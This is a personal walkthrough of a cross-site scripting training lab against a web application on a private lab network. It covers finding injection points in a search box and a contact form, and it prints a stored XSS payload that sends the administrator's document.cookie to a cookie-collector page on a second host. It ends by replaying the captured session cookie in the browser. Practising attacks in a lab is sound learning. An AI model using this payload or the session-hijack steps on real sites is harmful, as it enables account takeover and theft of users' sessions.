XSS- Cross Site Scripting Attack

In this lab, we will be attacking the websites for a possible XSS vulnerabilities.

What is XSS?

It is a type of attack which occurs when the user input is not sanitized and is blindly taken and executed. This attack happens when attacker runs a malicious scripts in the user input forms like search boxes, contact forms, etc.,

There are 3 types of xss attacks

Stored XSS
Reflected XSS
DOM based

Description

In this lab you can practice XSS attacks against a web application hosted at the address 192.168.99.10. Since the application allows registered users to add comments, we have already created an account on the application. The credentials of this account are:

Username: attacker
Password: attacker

Moreover, we created another web page in the lab for your convenience. You can use it to receive stolen cookies! You can find it at http://192.168.99.11/get.php : it takes all parameters passed via GET and stores them into the jar.txt file.

Note that this page is not the target of your security tests.

Goal

The administrator visits the application every few minutes. The final goal of the lab is to steal the administrator cookies via XSS. Once you have these cookies you should be able to access the content of the page admin.php.

Tools

The best tool for this lab is your brain, but you may also need a web browser.

Steps

Find all the XSS

There are many injection points in the web application, but only few of these are vulnerable. Go find them.

Steal the admin session cookies

You should have found a vulnerable injection point in the previous step. Use it to steal the administrator cookies and then install the cookies in your browser!

If you use the administrator cookies you will be able to access the content of the admin.php page.

Solutions

Checked the devices in the network.

┌──(kali㉿kali)-[~/Desktop]
└─$ fping -a -g 192.168.99.0/24 2>/dev/null     
192.168.99.11
192.168.99.10
192.168.99.100

as we know we have a webserver running a site on it. This lab is pretty straight forward. Hence i'll go ahead and skip the nmap scans.

we have the site like this

also we have the credentials for this website as a user/attacker.

username: attacker
password: attacker

now lets search for the possible injection points in the website.

Never skip any of the input forms in the website.

i search for the hello in the search form, my input was taken and it became the part of the url, now let me try and execute a script.

<script>alert('this is a vulnerable xss');</script>

lets further poke into the site to detect other xss points for code injection.

there is a one more xss vulnerability in the contact form.

now by the administrators behavior we know that admin is logging into the website with admin credentials and checking the customer reviews. So, now ill go ahead and try a script that displays my cookie.

i used the below script for displaying my cookie.

<script>alert(document.cookie);</script>

lets no try to steal the cookies of the admin, who logs in frequently to check the customer reviews.

Also, there is another website thats already setup, that takes the input values that we give it.

<script>

var i = new Image();

i.src="http://192.168.99.11/get.php?test="+document.cookie;

</script>

now lets execute this over here and wait for the admin to login.

here we ran into a issue, the thing is that we had used a alert based cookie that was popping up. So now the logic breaks here. Admin is no longer pressing okay and hence this logic is failing. so i had to reset the lab :-(

after resetting i came back to the same point and added the cookie stealing script before anything else.

This is the admin cookie 9kcetv3qhuo309eb35f3m9h1s0 .

lets inject that cookies into our firefox ->inspect elements-> storage -> cookies and edit our admin cookies over there.